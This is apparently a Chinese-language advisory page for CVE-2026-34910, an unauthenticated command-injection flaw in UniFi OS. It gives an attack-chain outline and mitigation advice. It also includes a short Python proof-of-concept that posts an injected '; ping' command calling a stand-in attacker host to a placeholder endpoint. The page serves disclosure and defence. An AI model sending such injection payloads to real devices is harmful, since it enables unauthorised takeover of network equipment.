CVE-2026-34910 CVSS 10.0 严重

CVE-2026-34910 UniFi OS远程命令执行漏洞

披露日期: 2026-05-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34910

漏洞类型

命令注入

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

UniFi OS

漏洞概述

UniFi OS设备中存在严重的不当输入验证漏洞。未经身份认证的攻击者可利用该漏洞，通过网络向受影响设备发送特制数据包，触发命令注入攻击。成功利用后，攻击者可在目标系统上执行任意系统命令，从而完全控制设备，造成数据泄露、篡改或服务中断。

技术细节

该漏洞是由于UniFi OS在处理特定网络输入时，缺乏足够的验证机制导致的。攻击者无需用户交互即可远程利用。通过向存在漏洞的接口发送包含恶意shell命令的请求，系统会将这些输入作为操作系统命令执行。鉴于CVSS向量中的S:C（范围改变），该漏洞可能影响同一网络上的其他系统。攻击复杂度低（AC:L），且无需权限（PR:N），极易被自动化工具大规模利用。

攻击链分析

STEP 1

侦察

攻击者扫描网络以识别暴露的UniFi OS设备及其服务端口。

STEP 2

漏洞利用

攻击者向目标设备的特定API端点发送包含恶意命令的特制HTTP请求。

STEP 3

命令执行

由于系统未正确过滤输入，后端将恶意参数作为操作系统命令执行。

STEP 4

建立控制

攻击者获取设备控制权，可能进一步安装后门或窃取数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable UniFi OS device
target_url = "http://<target-ip>/api/some/endpoint"

# Malicious payload to inject commands (e.g., ping a controlled server)
payload = "; ping -c 4 attacker-controlled.com"

# Send the malicious request
try:
    response = requests.post(target_url, data={"vulnerable_param": payload}, timeout=5)
    if response.status_code == 200:
        print("[+] Payload sent successfully, check your listener.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

UniFi OS (具体受影响版本请参考厂商公告)

防御指南

临时缓解措施

如果无法立即打补丁，建议将UniFi设备放置在隔离网络（VLAN）中，并关闭对互联网的管理接口访问，同时监控网络流量中是否存在异常的命令执行行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表